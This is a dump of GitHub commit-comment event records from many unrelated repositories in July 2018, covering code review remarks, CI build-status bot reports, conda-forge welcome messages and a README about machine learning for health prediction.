{"id":"7966380828","type":"CommitCommentEvent","actor":{"login":"Hellengeremias"},"repo":{"name":"Hellengeremias/Tese-HellenGeremias"},"payload":{"comment":{"id":29710578,"position":null,"line":null,"path":null,"commit_id":"479761f517cca6913f9eda8b7e534d926fedf9c6","created_at":"2018-07-14T21:19:33Z","updated_at":"2018-07-14T21:19:33Z","author_association":"OWNER","body":"Predictive models, public health and medicine\r\n\r\nThis repository contains R codes elaborated for the analysis presented in the thesis entitled \"Machine Learning for predictive health analyzes: challenges and perspectives\".\r\n\r\n1. The first article is a tutorial for the use of ML in health research, using as example the prediction of death up to 5 years for elderly participants  in the study “Saúde, Bem-estar e Envelhecimento”. Five algorithms were applied: logistic regression with and without regularization, neural networks, gradient boosted trees and random forest; hyperparameters were optimized by 10-fold cross validation.\r\n\r\n2. The second article aimed to the risk of quality-adjusted life year equal or less than 30 days in oncologic patients admitted to the Intensive Care Unit. Six algorithms (logistic regression with and without regularization, neural networks, basic decision trees, gradient boosted trees and random forest)\r\nwere used in conjunction with nested cross validation (leave-one-out cross validation for the outer loop and 10-fold cross validation for the inner loop).\r\n\r\n3. The third article aimed to predict life expectance at birth for Brazilian municipalities with more than 10,000 inhabitants using socioeconomic and demographic characteristics. For this analysis we used nested cross validation (10-fold cross validation both for outer and inner loop) and the Super Learner algorithm."}},"created_at":"2018-07-14T21:19:33Z"}
{"id":"7966381198","type":"CommitCommentEvent","actor":{"login":"Hellengeremias"},"repo":{"name":"Hellengeremias/Tese-HellenGeremias"},"payload":{"comment":{"id":29710579,"position":1,"line":1,"path":"README.md","commit_id":"479761f517cca6913f9eda8b7e534d926fedf9c6","created_at":"2018-07-14T21:19:53Z","updated_at":"2018-07-14T21:19:53Z","author_association":"OWNER","body":"Predictive models, public health and medicine\r\n\r\nThis repository contains R codes elaborated for the analysis presented in the thesis entitled \"Machine Learning for predictive health analyzes: challenges and perspectives\".\r\n\r\nThe first article is a tutorial for the use of ML in health research, using as example the prediction of death up to 5 years for elderly participants in the study “Saúde, Bem-estar e Envelhecimento”. Five algorithms were applied: logistic regression with and without regularization, neural networks, gradient boosted trees and random forest; hyperparameters were optimized by 10-fold cross validation.\r\n\r\nThe second article aimed to the risk of quality-adjusted life year equal or less than 30 days in oncologic patients admitted to the Intensive Care Unit. Six algorithms (logistic regression with and without regularization, neural networks, basic decision trees, gradient boosted trees and random forest)\r\nwere used in conjunction with nested cross validation (leave-one-out cross validation for the outer loop and 10-fold cross validation for the inner loop).\r\n\r\nThe third article aimed to predict life expectance at birth for Brazilian municipalities with more than 10,000 inhabitants using socioeconomic and demographic characteristics. For this analysis we used nested cross validation (10-fold cross validation both for outer and inner loop) and the Super Learner algorithm."}},"created_at":"2018-07-14T21:19:53Z"}
{"id":"7966382561","type":"CommitCommentEvent","actor":{"login":"emptyrivers"},"repo":{"name":"WeakAuras/WeakAuras2"},"payload":{"comment":{"id":29710581,"position":11,"line":1103,"path":"WeakAuras/WeakAuras.lua","commit_id":"9057e1d6915e21b487bf1cb09309d7f65a949fd9","created_at":"2018-07-14T21:21:07Z","updated_at":"2018-07-14T21:21:07Z","author_association":"CONTRIBUTOR","body":"How exactly will it not always exist? It’s ensured to exist 3 lines up."}},"created_at":"2018-07-14T21:21:07Z"}
{"id":"7966385714","type":"CommitCommentEvent","actor":{"login":"Nisnow"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29710582,"position":null,"line":null,"path":null,"commit_id":"ac7f215ac492beb4a7e0aa868fe20896f9b3023e","created_at":"2018-07-14T21:23:48Z","updated_at":"2018-07-14T21:23:48Z","author_association":"CONTRIBUTOR","body":"Thanks, didn't think of that."}},"created_at":"2018-07-14T21:23:48Z"}
{"id":"7966393212","type":"CommitCommentEvent","actor":{"login":"Bundesferkel"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29710594,"position":null,"line":null,"path":null,"commit_id":"12317b3d7e172923b9137023637c0de38175ecff","created_at":"2018-07-14T21:30:15Z","updated_at":"2018-07-14T21:30:15Z","author_association":"NONE","body":"Thanks. :)"}},"created_at":"2018-07-14T21:30:15Z"}
{"id":"7966393309","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29710596,"position":null,"line":null,"path":null,"commit_id":"d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b","created_at":"2018-07-14T21:30:19Z","updated_at":"2018-07-14T21:30:19Z","author_association":"NONE","body":"#6517-MissingEquationReference (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2940 of 2940 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-14T21:30:19Z"}
{"id":"7966393678","type":"CommitCommentEvent","actor":{"login":"pettenge"},"repo":{"name":"runelite/runelite"},"payload":{"comment":{"id":29710597,"position":null,"line":null,"path":null,"commit_id":"30c3ce9dc17f799aec59a177d82360becf6a664b","created_at":"2018-07-14T21:30:36Z","updated_at":"2018-07-14T21:30:36Z","author_association":"CONTRIBUTOR","body":"If that’s the case, there’s another invokeLater than can be removed in the newAutocomplete method"}},"created_at":"2018-07-14T21:30:36Z"}
{"id":"7966394572","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/mapio-feedstock"},"payload":{"comment":{"id":29710598,"position":null,"line":null,"path":null,"commit_id":"ccf9af3c628ef1f789009e257bbbec30e28aed02","created_at":"2018-07-14T21:31:18Z","updated_at":"2018-07-14T21:31:18Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @emthompson-usgs were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @emthompson-usgs were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-14T21:31:18Z"}
{"id":"7966394881","type":"CommitCommentEvent","actor":{"login":"Retrodigm"},"repo":{"name":"molecuul/climb"},"payload":{"comment":{"id":29710599,"position":null,"line":null,"path":null,"commit_id":"45d08fdc1318cf30ec100ad39385ab2495bfc492","created_at":"2018-07-14T21:31:36Z","updated_at":"2018-07-14T21:31:36Z","author_association":"COLLABORATOR","body":"Removed hook pull and added a rope joint instead."}},"created_at":"2018-07-14T21:31:36Z"}
{"id":"7966397402","type":"CommitCommentEvent","actor":{"login":"darkcosmo"},"repo":{"name":"OpenKore/openkore"},"payload":{"comment":{"id":29710603,"position":null,"line":null,"path":null,"commit_id":"8c7f71d50f4c7cf862291e29503a5fc20a43c48a","created_at":"2018-07-14T21:33:46Z","updated_at":"2018-07-14T21:33:46Z","author_association":"NONE","body":"\r\nhello my friend then downloaded the new update for IRO when I'm having a problem when I go to connect my character appears a message (time is exhausted on the map server, connecting to the server accounts)"}},"created_at":"2018-07-14T21:33:46Z"}
{"id":"7966397603","type":"CommitCommentEvent","actor":{"login":"Sija"},"repo":{"name":"luckyframework/lucky"},"payload":{"comment":{"id":29710604,"position":44,"line":44,"path":"src/lucky/force_ssl_handler.cr","commit_id":"9ca83da6e3d1d28fd93e43c070cc0e69af2b09e9","created_at":"2018-07-14T21:33:57Z","updated_at":"2018-07-14T21:33:57Z","author_association":"NONE","body":"`/https/i` -> `/\\Ahttps/i`"}},"created_at":"2018-07-14T21:33:57Z"}
{"id":"7966397639","type":"CommitCommentEvent","actor":{"login":"DerekK88"},"repo":{"name":"stevengj/libctl"},"payload":{"comment":{"id":29710605,"position":94,"line":2367,"path":"utils/geom.c","commit_id":"9f09e79765f92345ad4f4f04136597b4f0e43f25","created_at":"2018-07-14T21:34:00Z","updated_at":"2018-07-14T21:34:00Z","author_association":"NONE","body":"I noticed the same thing happens below in the function `normal_to_prism_roof_or_ceiling`"}},"created_at":"2018-07-14T21:34:00Z"}
{"id":"7966398579","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/positional-feedstock"},"payload":{"comment":{"id":29710607,"position":null,"line":null,"path":null,"commit_id":"a7ef3df57469c03f0483e429aa0dfc624075184d","created_at":"2018-07-14T21:34:51Z","updated_at":"2018-07-14T21:34:51Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @morganfainberg were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @morganfainberg were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-14T21:34:51Z"}
{"id":"7966399276","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29710608,"position":null,"line":null,"path":null,"commit_id":"6debbc49dafabc117fcd3a39fc9b677bf2438d90","created_at":"2018-07-14T21:35:28Z","updated_at":"2018-07-14T21:35:28Z","author_association":"MEMBER","body":"Builders are supposed to look like this."}},"created_at":"2018-07-14T21:35:28Z"}
{"id":"7966400595","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29710611,"position":null,"line":null,"path":null,"commit_id":"ad15e3194b2f6fec8eb72dc1180e90349fa3be60","created_at":"2018-07-14T21:36:40Z","updated_at":"2018-07-14T21:36:40Z","author_association":"NONE","body":"#6476-EquationFix (RKStrand) - Win64-Windows-7-VisualStudio-14: OK (2940 of 2940 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ad15e3194b2f6fec8eb72dc1180e90349fa3be60-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ad15e3194b2f6fec8eb72dc1180e90349fa3be60-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-14T21:36:40Z"}
{"id":"7966403770","type":"CommitCommentEvent","actor":{"login":"krlmlr"},"repo":{"name":"mfrasca/r-logging"},"payload":{"comment":{"id":29710612,"position":null,"line":null,"path":null,"commit_id":"a4e53fd2e11c13475a9b6c438bd687497d3b7fb2","created_at":"2018-07-14T21:39:21Z","updated_at":"2018-07-14T21:39:21Z","author_association":"CONTRIBUTOR","body":"There are other logging packages: _log4r_ (where I'm happy to give away maintenance to @atheriel), _futile.logger_, _loggr_ (not on CRAN) and _debugme_ (which is most useful for R packages because it has a low footprint). I've been thinking about unifying _log4r_  and _logging_ (https://github.com/johnmyleswhite/log4r/issues/3) but never found the time to do it."}},"created_at":"2018-07-14T21:39:21Z"}
{"id":"7966404268","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29710613,"position":null,"line":null,"path":null,"commit_id":"6debbc49dafabc117fcd3a39fc9b677bf2438d90","created_at":"2018-07-14T21:39:49Z","updated_at":"2018-07-14T21:39:49Z","author_association":"MEMBER","body":"There's only one item, so I don't see any reason to break the line unnecessarily."}},"created_at":"2018-07-14T21:39:49Z"}
{"id":"7966404387","type":"CommitCommentEvent","actor":{"login":"Nipodemos"},"repo":{"name":"OpenKore/openkore"},"payload":{"comment":{"id":29710614,"position":null,"line":null,"path":null,"commit_id":"8c7f71d50f4c7cf862291e29503a5fc20a43c48a","created_at":"2018-07-14T21:39:54Z","updated_at":"2018-07-14T21:39:54Z","author_association":"CONTRIBUTOR","body":"unfortunaly this still doesn't solve your problem, we'll have to wait more until other person fix"}},"created_at":"2018-07-14T21:39:54Z"}
{"id":"7966409063","type":"CommitCommentEvent","actor":{"login":"agodemar"},"repo":{"name":"Aircraft-Design-UniNa/jpad"},"payload":{"comment":{"id":29710623,"position":null,"line":null,"path":null,"commit_id":"17f3b86f05e14446e3b9fe324364dc21ea1b976d","created_at":"2018-07-14T21:44:02Z","updated_at":"2018-07-14T21:44:02Z","author_association":"CONTRIBUTOR","body":"@VittorioTrifari There's a bug in aircraft top view. VTail root profile is incorrect, t.e. seems taken from HTail root profile."}},"created_at":"2018-07-14T21:44:02Z"}
{"id":"7966411897","type":"CommitCommentEvent","actor":{"login":"nazar-pc"},"repo":{"name":"aeternity/noise-c.wasm"},"payload":{"comment":{"id":29710627,"position":null,"line":null,"path":null,"commit_id":"9e823af5b08a6a1fe2c9e47e46c4b6bb0e0570ab","created_at":"2018-07-14T21:46:25Z","updated_at":"2018-07-14T21:46:25Z","author_association":"NONE","body":"This PR changes the API, am I right?\r\nCan you describe why did you need to specify custom options?"}},"created_at":"2018-07-14T21:46:25Z"}
{"id":"7966413326","type":"CommitCommentEvent","actor":{"login":"martinpgaunt"},"repo":{"name":"bogdanvlviv/rails"},"payload":{"comment":{"id":29710628,"position":1,"line":104,"path":"activerecord/test/cases/tasks/mysql_rake_test.rb","commit_id":"d2d72966c30e8a537ad1c5dbab52b148645d7b37","created_at":"2018-07-14T21:47:40Z","updated_at":"2018-07-14T21:47:40Z","author_association":"NONE","body":"K"}},"created_at":"2018-07-14T21:47:40Z"}
{"id":"7966415192","type":"CommitCommentEvent","actor":{"login":"recognitionone"},"repo":{"name":"Zazuzaz/unicornpol"},"payload":{"comment":{"id":29710629,"position":null,"line":null,"path":null,"commit_id":"e22257789aba667fa2dd11fadfc765989ba995a5","created_at":"2018-07-14T21:49:19Z","updated_at":"2018-07-14T21:49:19Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Products: nie dodaje się merchantprofile (nie ma go wcale)](https://trello.com/c/9KCpO6qU/35-products-nie-dodaje-si%C4%99-merchantprofile-nie-ma-go-wcale)"}},"created_at":"2018-07-14T21:49:19Z"}
{"id":"7966416412","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/ds-lime-feedstock"},"payload":{"comment":{"id":29710630,"position":null,"line":null,"path":null,"commit_id":"e8c651e2627e77f1b369d47d457e976b1904c92a","created_at":"2018-07-14T21:50:18Z","updated_at":"2018-07-14T21:50:18Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @aikramer2 were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @aikramer2 were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-14T21:50:18Z"}
{"id":"7966418639","type":"CommitCommentEvent","actor":{"login":"jtibshirani"},"repo":{"name":"imbs-hl/ranger"},"payload":{"comment":{"id":29710637,"position":18,"line":165,"path":"source/src/utility/utility.cpp","commit_id":"120ad06dd9803ceac2dbfc058fc13e4b7eeffb46","created_at":"2018-07-14T21:52:21Z","updated_at":"2018-07-14T21:52:21Z","author_association":"CONTRIBUTOR","body":"For the logic in this method, I also think we should also go with exactly what ranger has. The ranger maintainers are generally very good about benchmarking changes, so we'll have confidence that it is fast. It also makes it easier to debug our code when there is a direct comparison to ranger when possible, as we can consult their bug reports, PRs, etc."}},"created_at":"2018-07-14T21:52:21Z"}
{"id":"7966420223","type":"CommitCommentEvent","actor":{"login":"utoyvo"},"repo":{"name":"utoyvo/utoyvo.github.io"},"payload":{"comment":{"id":29710641,"position":null,"line":null,"path":null,"commit_id":"0973c1f81f0a3f9b24c4cba5774ad26f9f4dffc0","created_at":"2018-07-14T21:53:42Z","updated_at":"2018-07-14T21:53:42Z","author_association":"OWNER","body":"test image in _uploads_ folder, initial folder state is **empty**."}},"created_at":"2018-07-14T21:53:42Z"}
{"id":"7966421343","type":"CommitCommentEvent","actor":{"login":"jaykrell"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":29710642,"position":437,"line":2221,"path":"mono/metadata/cominterop.c","commit_id":"18b6846a3a2218525b7335a1f0515de93a1e44ca","created_at":"2018-07-14T21:54:42Z","updated_at":"2018-07-14T21:54:42Z","author_association":"MEMBER","body":"fixme: If we change this to a new mono_gchandle_is_null_or_equal_handle, returning too gbooleans, then the loop can be put back, and a handle creation avoided. I considered that, but the two booleans seemed ugly at the time."}},"created_at":"2018-07-14T21:54:42Z"}
{"id":"7966424582","type":"CommitCommentEvent","actor":{"login":"sideshowbarker"},"repo":{"name":"validator/validator"},"payload":{"comment":{"id":29710652,"position":6,"line":1304,"path":"src/nu/validator/checker/schematronequiv/Assertions.java","commit_id":"9e1e657363711b8b51690aab75dec05195199119","created_at":"2018-07-14T21:57:21Z","updated_at":"2018-07-14T21:57:21Z","author_association":"MEMBER","body":"Thanks yup fixed in df016bdd6a42c0dda3caf96e96fba4f354e19d02"}},"created_at":"2018-07-14T21:57:21Z"}
{"id":"7966430223","type":"CommitCommentEvent","actor":{"login":"caco3"},"repo":{"name":"Ryan-Myers/canon-selphy-print"},"payload":{"comment":{"id":29710667,"position":null,"line":null,"path":null,"commit_id":"c469bc2b4a2f0001a290cb4ff7cb9cd832244685","created_at":"2018-07-14T22:01:58Z","updated_at":"2018-07-14T22:01:58Z","author_association":"NONE","body":"Cool, many congratulations! I hope it was a great day and you two had a great honeymoon!\r\n\r\nI installed the printer using your ppd file. The installation seemed to success. How ever when I try to print, I get this error: `/usr/lib/cups/filter/rastertogutenprint.5.3 not available`\r\nCan you check if such file exists on your system?\r\n\r\nI then compiled the package myself (gutenprint-5.3.0-pre1) according your instructions, also I packed it with `make checkinstall`. How ever I couldn't find such file nor a ppd file for the CP1300 (only the one for the CP1200 seems to be built)!"}},"created_at":"2018-07-14T22:01:58Z"}
{"id":"7966431653","type":"CommitCommentEvent","actor":{"login":"krlmlr"},"repo":{"name":"krlmlr/wrswoR"},"payload":{"comment":{"id":29710674,"position":132,"line":1189,"path":"vignettes/wrswoR.Rmd","commit_id":"07d83a683e62382a31e0d1ccb9a7d2ec08409852","created_at":"2018-07-14T22:03:03Z","updated_at":"2018-07-14T22:03:03Z","author_association":"OWNER","body":"Thanks for the pointer, I remember this particular instance was because I needed both the autogenerated and a custom `.bib`. I'll keep this in mind."}},"created_at":"2018-07-14T22:03:03Z"}
{"id":"7966432385","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29710677,"position":null,"line":null,"path":null,"commit_id":"ee180c57ba07a13b087f669889a842078a5e628d","created_at":"2018-07-14T22:03:41Z","updated_at":"2018-07-14T22:03:41Z","author_association":"NONE","body":"kiva-non-quad-walls (nealkruis) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2314 of 2314 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee180c57ba07a13b087f669889a842078a5e628d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee180c57ba07a13b087f669889a842078a5e628d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee180c57ba07a13b087f669889a842078a5e628d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-14T22:03:41Z"}
{"id":"7966433568","type":"CommitCommentEvent","actor":{"login":"camara94"},"repo":{"name":"camara94/config_srv_ajax"},"payload":{"comment":{"id":29710678,"position":null,"line":null,"path":null,"commit_id":"e18eb9b1c6657de52c67bbc6d426320034d188be","created_at":"2018-07-14T22:04:40Z","updated_at":"2018-07-14T22:04:40Z","author_association":"OWNER","body":"Une dernière modification"}},"created_at":"2018-07-14T22:04:40Z"}
{"id":"7966434055","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29710679,"position":null,"line":null,"path":null,"commit_id":"ee180c57ba07a13b087f669889a842078a5e628d","created_at":"2018-07-14T22:05:06Z","updated_at":"2018-07-14T22:05:06Z","author_association":"NONE","body":"kiva-non-quad-walls (nealkruis) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee180c57ba07a13b087f669889a842078a5e628d-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-14T22:05:06Z"}
{"id":"7966434198","type":"CommitCommentEvent","actor":{"login":"tablatronix"},"repo":{"name":"GetSimpleCMS/GetSimpleCMS"},"payload":{"comment":{"id":29710680,"position":null,"line":null,"path":null,"commit_id":"4b814a838be73f1da02856ba8ad30917362069c6","created_at":"2018-07-14T22:05:12Z","updated_at":"2018-07-14T22:05:12Z","author_association":"MEMBER","body":"I didnt want them clickable to disable, that is why I put the cusrsor css..."}},"created_at":"2018-07-14T22:05:12Z"}
{"id":"7966434473","type":"CommitCommentEvent","actor":{"login":"amirziari"},"repo":{"name":"tj/co"},"payload":{"comment":{"id":29710681,"position":5,"line":15,"path":"Readme.md","commit_id":"d982f932cb4982de6cc3025f8e3124528c823a16","created_at":"2018-07-14T22:05:27Z","updated_at":"2018-07-14T22:05:27Z","author_association":"NONE","body":"Tc39"}},"created_at":"2018-07-14T22:05:27Z"}
{"id":"7966434501","type":"CommitCommentEvent","actor":{"login":"camara94"},"repo":{"name":"camara94/config_srv_ajax"},"payload":{"comment":{"id":29710682,"position":null,"line":null,"path":null,"commit_id":"e18eb9b1c6657de52c67bbc6d426320034d188be","created_at":"2018-07-14T22:05:28Z","updated_at":"2018-07-14T22:05:28Z","author_association":"OWNER","body":"c'était juste de voir si la modification a été effectuée"}},"created_at":"2018-07-14T22:05:28Z"}
{"id":"7966435400","type":"CommitCommentEvent","actor":{"login":"Jdalt40"},"repo":{"name":"Jdalt40/MD2_mechanicalwalls"},"payload":{"comment":{"id":29710684,"position":null,"line":null,"path":null,"commit_id":"e2306c4aa06bcbed632330392fd86b5b75e18506","created_at":"2018-07-14T22:06:14Z","updated_at":"2018-07-14T22:06:14Z","author_association":"OWNER","body":"Recompiled and fixed errors for 1.0.1964"}},"created_at":"2018-07-14T22:06:14Z"}
{"id":"7966438175","type":"CommitCommentEvent","actor":{"login":"tablatronix"},"repo":{"name":"GetSimpleCMS/GetSimpleCMS"},"payload":{"comment":{"id":29710691,"position":5,"line":170,"path":"admin/install.php","commit_id":"4b814a838be73f1da02856ba8ad30917362069c6","created_at":"2018-07-14T22:08:44Z","updated_at":"2018-07-14T22:08:44Z","author_association":"MEMBER","body":"When is this the case? New install ?"}},"created_at":"2018-07-14T22:08:44Z"}
{"id":"7966438339","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29710692,"position":null,"line":null,"path":null,"commit_id":"f33044c2517086b75e3eee4d97a9779e98c71921","created_at":"2018-07-14T22:08:52Z","updated_at":"2018-07-14T22:08:52Z","author_association":"NONE","body":"#6806-InconsistentConvectionCoeffs (RKStrand) - i386-Windows-7-VisualStudio-14: OK (2940 of 2941 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 650\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f33044c2517086b75e3eee4d97a9779e98c71921-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f33044c2517086b75e3eee4d97a9779e98c71921-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-14T22:08:52Z"}
{"id":"7966439723","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/biggus-feedstock"},"payload":{"comment":{"id":29710694,"position":null,"line":null,"path":null,"commit_id":"03671bd36a7ab1600dfc7b38fd4cbf7daf81f3cd","created_at":"2018-07-14T22:10:09Z","updated_at":"2018-07-14T22:10:09Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @marqh were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @marqh were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-14T22:10:09Z"}
{"id":"7966443213","type":"CommitCommentEvent","actor":{"login":"ghandeb"},"repo":{"name":"odtu/odtu.github.io"},"payload":{"comment":{"id":29710697,"position":null,"line":null,"path":null,"commit_id":"a97ee51d47a8f395572cbe5afb6adb24bdb8296c","created_at":"2018-07-14T22:13:32Z","updated_at":"2018-07-14T22:13:32Z","author_association":"MEMBER","body":"nail yaziklar olsun sebebi neydi ki......."}},"created_at":"2018-07-14T22:13:32Z"}
{"id":"7966443473","type":"CommitCommentEvent","actor":{"login":"ghandeb"},"repo":{"name":"odtu/odtu.github.io"},"payload":{"comment":{"id":29710698,"position":null,"line":null,"path":null,"commit_id":"a97ee51d47a8f395572cbe5afb6adb24bdb8296c","created_at":"2018-07-14T22:13:50Z","updated_at":"2018-07-14T22:13:50Z","author_association":"MEMBER","body":"kaldir onlari gozunu seveyim yav"}},"created_at":"2018-07-14T22:13:50Z"}
{"id":"7966446029","type":"CommitCommentEvent","actor":{"login":"r7vmc"},"repo":{"name":"Infernus101/KitUI"},"payload":{"comment":{"id":29710703,"position":null,"line":null,"path":null,"commit_id":"ef44358a89fb866f8ce807c4361685c066addd9b","created_at":"2018-07-14T22:16:05Z","updated_at":"2018-07-14T22:16:05Z","author_association":"NONE","body":"No need to put all apis"}},"created_at":"2018-07-14T22:16:05Z"}
{"id":"7966446345","type":"CommitCommentEvent","actor":{"login":"amirziari"},"repo":{"name":"GNOME/gnome-desktop"},"payload":{"comment":{"id":29710705,"position":8,"line":20,"path":"po/zh_CN.po","commit_id":"36c6717a341100274fb29101395763902bee7cdb","created_at":"2018-07-14T22:16:21Z","updated_at":"2018-07-14T22:16:21Z","author_association":"NONE","body":"@"}},"created_at":"2018-07-14T22:16:21Z"}
{"id":"7966446394","type":"CommitCommentEvent","actor":{"login":"r7vmc"},"repo":{"name":"Infernus101/KitUI"},"payload":{"comment":{"id":29710706,"position":null,"line":null,"path":null,"commit_id":"ef44358a89fb866f8ce807c4361685c066addd9b","created_at":"2018-07-14T22:16:24Z","updated_at":"2018-07-14T22:16:24Z","author_association":"NONE","body":"3.0.0 will work on 3.0.6 "}},"created_at":"2018-07-14T22:16:24Z"}
{"id":"7966446727","type":"CommitCommentEvent","actor":{"login":"amirziari"},"repo":{"name":"GNOME/gnome-desktop"},"payload":{"comment":{"id":29710708,"position":9,"line":21,"path":"po/zh_CN.po","commit_id":"36c6717a341100274fb29101395763902bee7cdb","created_at":"2018-07-14T22:16:45Z","updated_at":"2018-07-14T22:16:45Z","author_association":"NONE","body":"P"}},"created_at":"2018-07-14T22:16:45Z"}
{"id":"7966448489","type":"CommitCommentEvent","actor":{"login":"tablatronix"},"repo":{"name":"GetSimpleCMS/GetSimpleCMS"},"payload":{"comment":{"id":29710710,"position":5,"line":56,"path":"admin/plugins.php","commit_id":"4b814a838be73f1da02856ba8ad30917362069c6","created_at":"2018-07-14T22:18:22Z","updated_at":"2018-07-14T22:18:22Z","author_association":"MEMBER","body":"missing quotes syntax error, already fixed\r\n"}},"created_at":"2018-07-14T22:18:22Z"}
